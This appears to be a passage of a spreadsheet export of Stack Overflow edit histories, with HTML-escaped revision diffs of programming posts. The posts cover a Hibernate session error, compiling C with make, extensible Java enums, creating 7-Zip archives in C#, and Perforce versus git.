    &amp;lt;generator &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"native"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;/id&amp;gt;_x000D_
  &amp;lt;!-- Some properties here --&amp;gt;_x000D_
&amp;lt;/&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&amp;gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In my Spring config file I have:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&amp;lt;tx:advice id=&lt;span class="hljs-string"&gt;"txAdvice"&lt;/span&gt; transaction-manager=&lt;span class="hljs-string"&gt;"txManager"&lt;/span&gt;&amp;gt;_x000D_
  &amp;lt;tx:attributes&amp;gt;_x000D_
    &amp;lt;tx:method name=&lt;span class="hljs-string"&gt;"*"&lt;/span&gt; propagation=&lt;span class="hljs-string"&gt;"REQUIRED"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;/tx:attributes&amp;gt;_x000D_
&amp;lt;/tx:advice&amp;gt;_x000D_
&amp;lt;aop:config&amp;gt;_x000D_
  &amp;lt;aop:pointcut id=&lt;span class="hljs-string"&gt;"managers"&lt;/span&gt; expression=&lt;span class="hljs-string"&gt;"execution(public * com.foo.*Manager.*(..))"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;aop:advisor advice-ref=&lt;span class="hljs-string"&gt;"txAdvice"&lt;/span&gt; pointcut-ref=&lt;span class="hljs-string"&gt;"managers"&lt;/span&gt;/&amp;gt;_x000D_
&amp;lt;/aop:config&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And finally the code where it all fails within my manager class &lt;code&gt;&lt;span class="diff-delete"&gt;com.foo.LookupTableManager&lt;/span&gt;&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;addColumnToTable&lt;/span&gt;&lt;span class="hljs-params"&gt;(Column column, &lt;span class="hljs-keyword"&gt;long&lt;/span&gt; tableId)&lt;/span&gt; &lt;/span&gt;{_x000D_
  LookupTable lookupTable = &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;.lookupTableDao.findById(tableId);_x000D_
  lookupTable.addColumn(column);_x000D_
  &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;.lookupTableDao.saveOrUpdate(lookupTable);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The variable lookupTableDao here refers to a simple DAO class which extends HibernateDaoSupport.&lt;/p&gt; _x000D_
 &lt;p&gt; The error I get is:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;org.hibernate.HibernateException: Illegal attempt to associate a collection with two open sessions_x000D_
  at org.hibernate.collection.AbstractPersistentCollection.setCurrentSession(AbstractPersistentCollection.java:&lt;span class="hljs-number"&gt;410&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.OnUpdateVisitor.processCollection(OnUpdateVisitor.java:&lt;span class="hljs-number"&gt;43&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.AbstractVisitor.processValue(AbstractVisitor.java:&lt;span class="hljs-number"&gt;101&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.AbstractVisitor.processValue(AbstractVisitor.java:&lt;span class="hljs-number"&gt;61&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.AbstractVisitor.processEntityPropertyValues(AbstractVisitor.java:&lt;span class="hljs-number"&gt;55&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.AbstractVisitor.process(AbstractVisitor.java:&lt;span class="hljs-number"&gt;123&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.DefaultSaveOrUpdateEventListener.performUpdate(DefaultSaveOrUpdateEventListener.java:&lt;span class="hljs-number"&gt;293&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.DefaultSaveOrUpdateEventListener.entityIsDetached(DefaultSaveOrUpdateEventListener.java:&lt;span class="hljs-number"&gt;223&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.DefaultSaveOrUpdateEventListener.performSaveOrUpdate(DefaultSaveOrUpdateEventListener.java:&lt;span class="hljs-number"&gt;89&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.DefaultSaveOrUpdateEventListener.onSaveOrUpdate(DefaultSaveOrUpdateEventListener.java:&lt;span class="hljs-number"&gt;70&lt;/span&gt;)_x000D_
  at org.hibernate.impl.SessionImpl.fireSaveOrUpdate(SessionImpl.java:&lt;span class="hljs-number"&gt;507&lt;/span&gt;)_x000D_
  at org.hibernate.impl.SessionImpl.saveOrUpdate(SessionImpl.java:&lt;span class="hljs-number"&gt;499&lt;/span&gt;)_x000D_
  at org.hibernate.impl.SessionImpl.saveOrUpdate(SessionImpl.java:&lt;span class="hljs-number"&gt;495&lt;/span&gt;)_x000D_
  at com.foo.AbstractDao.saveOrUpdate(AbstractDao.java:&lt;span class="hljs-number"&gt;29&lt;/span&gt;)_x000D_
  at com.foo.LookupTableManager.addColumnToTable(LookupTableManager.java:&lt;span class="hljs-number"&gt;338&lt;/span&gt;)_x000D_
... etc ..._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I don't understand where the second session&lt;span class="diff-delete"&gt; is coming from&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm using Hibernate 3.2.6.ga, Spring 2.5.5 and Tomcat 6.0&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to add a &lt;span class="diff-add"&gt;pojo&lt;/span&gt; to a collection in another &lt;span class="diff-add"&gt;pojo. I'm sure I'm making&lt;/span&gt; a &lt;span class="diff-add"&gt;really stupid mistake somewhere along the lines but I can't figure out how to solve it.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I have a pojo LookupTable&lt;/span&gt; which contains a list of &lt;span class="diff-add"&gt;Column's&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;LookupTable&lt;/span&gt; &lt;/span&gt;{_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-keyword"&gt;long&lt;/span&gt; id;_x000D_
  &lt;span class="hljs-comment"&gt;// More properties go here...&lt;/span&gt;_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; List&amp;lt;Column&amp;gt; columns;_x000D_
_x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;addColumn&lt;/span&gt;&lt;span class="hljs-params"&gt;(Column column)&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;.columns.add(column);_x000D_
  }_x000D_
_x000D_
  &lt;span class="hljs-comment"&gt;// More methods go here...&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In my hibernate configuration I have:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&amp;lt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;name&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"LookupTable"&lt;/span&gt; table=&lt;span class="hljs-string"&gt;"ARR_LOOKUP_TABLE"&lt;/span&gt;&amp;gt;_x000D_
  &amp;lt;id name=&lt;span class="hljs-string"&gt;"id"&lt;/span&gt; column=&lt;span class="hljs-string"&gt;"ID"&lt;/span&gt;&amp;gt;_x000D_
    &amp;lt;generator &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"native"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;/id&amp;gt;_x000D_
  &amp;lt;!-- Some properties here --&amp;gt;_x000D_
  &amp;lt;bag name=&lt;span class="hljs-string"&gt;"columns"&lt;/span&gt; cascade=&lt;span class="hljs-string"&gt;"all,delete-orphan"&lt;/span&gt; access=&lt;span class="hljs-string"&gt;"field"&lt;/span&gt;&amp;gt;_x000D_
    &amp;lt;key column=&lt;span class="hljs-string"&gt;"LOOKUP_TABLE"&lt;/span&gt; not-&lt;span class="hljs-keyword"&gt;null&lt;/span&gt;=&lt;span class="hljs-string"&gt;"true"&lt;/span&gt;/&amp;gt;_x000D_
    &amp;lt;one-to-many &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Column"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;/bag&amp;gt;_x000D_
&amp;lt;/&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&amp;gt;_x000D_
_x000D_
&amp;lt;&lt;span class="hljs-title"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;name&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Column"&lt;/span&gt; table=&lt;span class="hljs-string"&gt;"ARR_LOOKUP_COLUMN"&lt;/span&gt;&amp;gt;_x000D_
  &amp;lt;id name=&lt;span class="hljs-string"&gt;"id"&lt;/span&gt; column=&lt;span class="hljs-string"&gt;"ID"&lt;/span&gt;&amp;gt;_x000D_
    &amp;lt;generator &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"native"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;/id&amp;gt;_x000D_
  &amp;lt;!-- Some properties here --&amp;gt;_x000D_
&amp;lt;/&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&amp;gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In my Spring config file I have:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&amp;lt;tx:advice id=&lt;span class="hljs-string"&gt;"txAdvice"&lt;/span&gt; transaction-manager=&lt;span class="hljs-string"&gt;"txManager"&lt;/span&gt;&amp;gt;_x000D_
  &amp;lt;tx:attributes&amp;gt;_x000D_
    &amp;lt;tx:method name=&lt;span class="hljs-string"&gt;"*"&lt;/span&gt; propagation=&lt;span class="hljs-string"&gt;"REQUIRED"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;/tx:attributes&amp;gt;_x000D_
&amp;lt;/tx:advice&amp;gt;_x000D_
&amp;lt;aop:config&amp;gt;_x000D_
  &amp;lt;aop:pointcut id=&lt;span class="hljs-string"&gt;"managers"&lt;/span&gt; expression=&lt;span class="hljs-string"&gt;"execution(public * com.foo.*Manager.*(..))"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;aop:advisor advice-ref=&lt;span class="hljs-string"&gt;"txAdvice"&lt;/span&gt; pointcut-ref=&lt;span class="hljs-string"&gt;"managers"&lt;/span&gt;/&amp;gt;_x000D_
&amp;lt;/aop:config&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And finally the code where it all fails within my manager class &lt;span class="diff-add"&gt;(com.foo.LookupTableManager)&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;addColumnToTable&lt;/span&gt;&lt;span class="hljs-params"&gt;(Column column, &lt;span class="hljs-keyword"&gt;long&lt;/span&gt; tableId)&lt;/span&gt; &lt;/span&gt;{_x000D_
  LookupTable lookupTable = &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;.lookupTableDao.findById(tableId);_x000D_
  lookupTable.addColumn(column);_x000D_
  &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;.lookupTableDao.saveOrUpdate(lookupTable);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The variable lookupTableDao here refers to a simple DAO class which extends HibernateDaoSupport.&lt;/p&gt; _x000D_
 &lt;p&gt; The error I get is:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;org.hibernate.HibernateException: Illegal attempt to associate a collection with two open sessions_x000D_
  at org.hibernate.collection.AbstractPersistentCollection.setCurrentSession(AbstractPersistentCollection.java:&lt;span class="hljs-number"&gt;410&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.OnUpdateVisitor.processCollection(OnUpdateVisitor.java:&lt;span class="hljs-number"&gt;43&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.AbstractVisitor.processValue(AbstractVisitor.java:&lt;span class="hljs-number"&gt;101&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.AbstractVisitor.processValue(AbstractVisitor.java:&lt;span class="hljs-number"&gt;61&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.AbstractVisitor.processEntityPropertyValues(AbstractVisitor.java:&lt;span class="hljs-number"&gt;55&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.AbstractVisitor.process(AbstractVisitor.java:&lt;span class="hljs-number"&gt;123&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.DefaultSaveOrUpdateEventListener.performUpdate(DefaultSaveOrUpdateEventListener.java:&lt;span class="hljs-number"&gt;293&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.DefaultSaveOrUpdateEventListener.entityIsDetached(DefaultSaveOrUpdateEventListener.java:&lt;span class="hljs-number"&gt;223&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.DefaultSaveOrUpdateEventListener.performSaveOrUpdate(DefaultSaveOrUpdateEventListener.java:&lt;span class="hljs-number"&gt;89&lt;/span&gt;)_x000D_
  at org.hibernate.event.def.DefaultSaveOrUpdateEventListener.onSaveOrUpdate(DefaultSaveOrUpdateEventListener.java:&lt;span class="hljs-number"&gt;70&lt;/span&gt;)_x000D_
  at org.hibernate.impl.SessionImpl.fireSaveOrUpdate(SessionImpl.java:&lt;span class="hljs-number"&gt;507&lt;/span&gt;)_x000D_
  at org.hibernate.impl.SessionImpl.saveOrUpdate(SessionImpl.java:&lt;span class="hljs-number"&gt;499&lt;/span&gt;)_x000D_
  at org.hibernate.impl.SessionImpl.saveOrUpdate(SessionImpl.java:&lt;span class="hljs-number"&gt;495&lt;/span&gt;)_x000D_
  at com.foo.AbstractDao.saveOrUpdate(AbstractDao.java:&lt;span class="hljs-number"&gt;29&lt;/span&gt;)_x000D_
  at com.foo.LookupTableManager.addColumnToTable(LookupTableManager.java:&lt;span class="hljs-number"&gt;338&lt;/span&gt;)_x000D_
... etc ..._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; OK,&lt;/span&gt; I&lt;span class="diff-add"&gt; understand the basic message I'm getting. But what I&lt;/span&gt; don't understand&lt;span class="diff-add"&gt; is&lt;/span&gt; where&lt;span class="diff-add"&gt; I get&lt;/span&gt; the second session&lt;span class="diff-add"&gt;...&lt;/span&gt;.&lt;span class="diff-add"&gt; Can anyone help me with this?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I'm using Hibernate 3.2.6.ga, Spring 2.5.5 and Tomcat 6.0&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jaap Coomans</t>
  </si>
  <si>
    <t>Rann Lifshitz</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If it is a simple single source program:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;gcc foo.c_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; or:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;make foo_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; where the source file is foo.c or foo.cpp, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; You dont even need a makefile. Make has enough built-in rules to build your source file into an executable of the same name, minus extension.&lt;/p&gt; _x000D_
 &lt;p&gt; Running the executable just built is the same as running any program - but you will most often need to specify the path to the executable as the shell will only search what is in &lt;code&gt;$PATH&lt;/code&gt; to find executables, and most often that does not include the current directory (&lt;code&gt;.&lt;/code&gt;).&lt;/p&gt; _x000D_
 &lt;p&gt; So to run the built executable &lt;code&gt;foo&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;./foo_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If it is a simple single source program:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;make foo_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; where the source file is foo.c or foo.cpp, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; You dont even need a makefile. Make has enough built-in rules to build your source file into an executable of the same name, minus extension.&lt;/p&gt; _x000D_
 &lt;p&gt; Running the executable just built is the same as running any program - but you will most often need to specify the path to the executable as the shell will only search what is in &lt;code&gt;$PATH&lt;/code&gt; to find executables, and most often that does not include the current directory (&lt;code&gt;.&lt;/code&gt;).&lt;/p&gt; _x000D_
 &lt;p&gt; So to run the built executable &lt;code&gt;foo&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;./foo_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>camh</t>
  </si>
  <si>
    <t>chaNcharge</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a way to write an enumeration that can be extended. I have several methods that I would like to &lt;span class="diff-delete"&gt;always&lt;/span&gt; have available for my enumerations. For example I use an enumeration for my database fields. I include the actual field name in the database.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public enum ORDERFIELDS {_x000D_
  OrderID("Order_ID");_x000D_
  private String &lt;span class="diff-delete"&gt;fieldName;&lt;/span&gt;_x000D_
  private ORDERFIELDS(String fname) {_x000D_
    this.&lt;span class="diff-delete"&gt;fieldName&lt;/span&gt; = fname;_x000D_
  }_x000D_
    &lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;  public String getFieldName()_x000D_
  {_x000D_
    return &lt;span class="diff-delete"&gt;fieldName;&lt;/span&gt;_x000D_
  }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a way to write an enumeration that can be extended. I have several methods that I would like to &lt;span class="diff-add"&gt;alway&lt;/span&gt; have available for my enumerations. For example I use an enumeration for my database fields. I include the actual field name in the database.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public enum ORDERFIELDS&lt;span class="diff-add"&gt;_x000D_
       &lt;/span&gt; {_x000D_
&lt;span class="diff-add"&gt;             &lt;/span&gt;  OrderID("Order_ID");_x000D_
&lt;span class="diff-add"&gt;          &lt;/span&gt;  private String &lt;span class="diff-add"&gt;FieldName;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;          &lt;/span&gt;  private ORDERFIELDS(String fname)&lt;span class="diff-add"&gt;_x000D_
               &lt;/span&gt; {_x000D_
&lt;span class="diff-add"&gt;                &lt;/span&gt;    this.&lt;span class="diff-add"&gt;FieldName&lt;/span&gt; = fname;_x000D_
&lt;span class="diff-add"&gt;              &lt;/span&gt;  }&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
    &lt;span class="diff-add"&gt;      &lt;/span&gt;  public String getFieldName()_x000D_
&lt;span class="diff-add"&gt;              &lt;/span&gt;  {_x000D_
&lt;span class="diff-add"&gt;                &lt;/span&gt;    return &lt;span class="diff-add"&gt;FieldName;&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;              &lt;/span&gt;  }_x000D_
&lt;span class="diff-add"&gt;        &lt;/span&gt;}&lt;span class="diff-add"&gt; &lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Milhous</t>
  </si>
  <si>
    <t>dhblah</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I create 7-Zip archives from my C# console application? I need to be able to extract the archives using the regular, widely available &lt;a href="http://www.7-zip.org/" rel="nofollow noreferrer"&gt;7-Zip&lt;/a&gt; program.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; _x000D_
 &lt;span class="diff-delete"&gt;**Here are the best result I got from this thread and my experience with it:**&lt;/span&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.eggheadcafe.com/tutorials/aspnet/064b41e4-60bc-4d35-9136-368603bcc27a/7zip-lzma-inmemory-com.aspx" rel="nofollow noreferrer"&gt;7Zip in memory compression&lt;/a&gt; -&lt;span class="diff-delete"&gt;&amp;gt;&lt;/span&gt; this refers to compressing cookies "in-memory" before sending to the client; this method seems somewhat promising. The wrapper methods (wrapping the &lt;a href="http://www.7-zip.org/sdk.html" rel="nofollow noreferrer"&gt;LZMA SDK&lt;/a&gt;) return type &lt;code&gt;byte[]&lt;/code&gt;. When I write the &lt;code&gt;byte[]&lt;/code&gt; array to a file, I can't extract it using 7-Zip (&lt;code&gt;File.7z is not supported archive&lt;/code&gt;).&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.codeplex.com/7zsharp" rel="nofollow noreferrer"&gt;7zSharp&lt;/a&gt; Wrapper (found on CodePlex) -&lt;span class="diff-delete"&gt;&amp;gt;&lt;/span&gt; this wraps the 7z exe/&lt;a href="http://www.7-zip.org/sdk.html" rel="nofollow noreferrer"&gt;LZMA SDK&lt;/a&gt;. I referenced the project from my app, and it successfully created some archive files, but I was unable to extract the files using the regular 7-Zip program (&lt;code&gt;File.7z is not supported archive&lt;/code&gt;).&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.7-zip.org/sdk.html" rel="nofollow noreferrer"&gt;7Zip SDK aka LZMA SDK&lt;/a&gt; -&lt;span class="diff-delete"&gt;&amp;gt;&lt;/span&gt; I guess I'm not smart enough to figure out how to use this (which is why I posted here)... Any working code examples that demonstrate creating a 7zip archive that is able to be extracted by the regular 7zip program?&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.codeproject.com/KB/DLL/cs_interface_7zip.aspx" rel="nofollow noreferrer"&gt;CodeProject C# (.NET) Interface for 7-Zip Archive DLLs&lt;/a&gt; -&lt;span class="diff-delete"&gt;&amp;gt;&lt;/span&gt; only supports extracting from 7zip archives... I need to create them!&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://sharpdevelop.net/OpenSource/SharpZipLib/Default.aspx" rel="nofollow noreferrer"&gt;SharpZipLib&lt;/a&gt; -&lt;span class="diff-delete"&gt;&amp;gt;&lt;/span&gt; According to their &lt;a href="http://wiki.sharpdevelop.net/SharpZipLib_FAQ.ashx" rel="nofollow noreferrer"&gt;FAQ&lt;/a&gt;, SharpZipLib doesn't support 7zip.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can I create 7-Zip archives from my C# console application? I need to be able to extract the archives using the regular, widely available &lt;a href="http://www.7-zip.org/" rel="nofollow noreferrer"&gt;7-Zip&lt;/a&gt; program.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt;&amp;nbsp;&lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Here are my results with the following examples that were found on Google&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.eggheadcafe.com/tutorials/aspnet/064b41e4-60bc-4d35-9136-368603bcc27a/7zip-lzma-inmemory-com.aspx" rel="nofollow noreferrer"&gt;7Zip in memory compression&lt;/a&gt; - this refers to compressing cookies "in-memory" before sending to the client; this method seems somewhat promising. The wrapper methods (wrapping the &lt;a href="http://www.7-zip.org/sdk.html" rel="nofollow noreferrer"&gt;LZMA SDK&lt;/a&gt;) return type &lt;code&gt;byte[]&lt;/code&gt;. When I write the &lt;code&gt;byte[]&lt;/code&gt; array to a file, I can't extract it using 7-Zip (&lt;code&gt;File.7z is not supported archive&lt;/code&gt;).&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.codeplex.com/7zsharp" rel="nofollow noreferrer"&gt;7zSharp&lt;/a&gt; Wrapper (found on CodePlex) - this wraps the 7z exe/&lt;a href="http://www.7-zip.org/sdk.html" rel="nofollow noreferrer"&gt;LZMA SDK&lt;/a&gt;. I referenced the project from my app, and it successfully created some archive files, but I was unable to extract the files using the regular 7-Zip program (&lt;code&gt;File.7z is not supported archive&lt;/code&gt;).&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.7-zip.org/sdk.html" rel="nofollow noreferrer"&gt;7Zip SDK aka LZMA SDK&lt;/a&gt; - I guess I'm not smart enough to figure out how to use this (which is why I posted here)... Any working code examples that demonstrate creating a 7zip archive that is able to be extracted by the regular 7zip program?&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.codeproject.com/KB/DLL/cs_interface_7zip.aspx" rel="nofollow noreferrer"&gt;CodeProject C# (.NET) Interface for 7-Zip Archive DLLs&lt;/a&gt; - only supports extracting from 7zip archives... I need to create them!&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://sharpdevelop.net/OpenSource/SharpZipLib/Default.aspx" rel="nofollow noreferrer"&gt;SharpZipLib&lt;/a&gt; - According to their &lt;a href="http://wiki.sharpdevelop.net/SharpZipLib_FAQ.ashx" rel="nofollow noreferrer"&gt;FAQ&lt;/a&gt;, SharpZipLib doesn't support 7zip.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Seibar</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It would take me a lot of convincing to switch from perforce. In the two companies I used it it was more than adequate. Those were both companies with disparate offices, but the offices were set up with plenty of infrastructure so there was no need to have the disjoint/disconnected features.&lt;/p&gt; _x000D_
 &lt;p&gt; How many developers are you talking about changing over?&lt;/p&gt; _x000D_
 &lt;p&gt; The real question is - what is it about perforce that is not meeting your organization's needs that git can provide? And similarly, what weaknesses does git have compared to perforce? If you can't answer that yourself then asking here won't help. You need to find a business case for your company. (e.g. Perhaps it is with lower overall cost of ownership (that includes loss of productivity for the interim learning stage, higher admin costs (at least initially), etc.)&lt;/p&gt; _x000D_
 &lt;p&gt; I think you are in for a tough sell - perforce is a pretty good one to try to replace. It is a no brainer if you are trying to boot out pvcs or ssafe.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; EDIT&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;(People seem to think this is a religious war and are downvoting this answer.)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you need to have the distributed and local branching with the merging functionality of git, then by all means switch, but don't do it just to jump on the git bandwagon.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It would take me a lot of convincing to switch from perforce. In the two companies I used it it was more than adequate. Those were both companies with disparate offices, but the offices were set up with plenty of infrastructure so there was no need to have the disjoint/disconnected features.&lt;/p&gt; _x000D_
 &lt;p&gt; How many developers are you talking about changing over?&lt;/p&gt; _x000D_
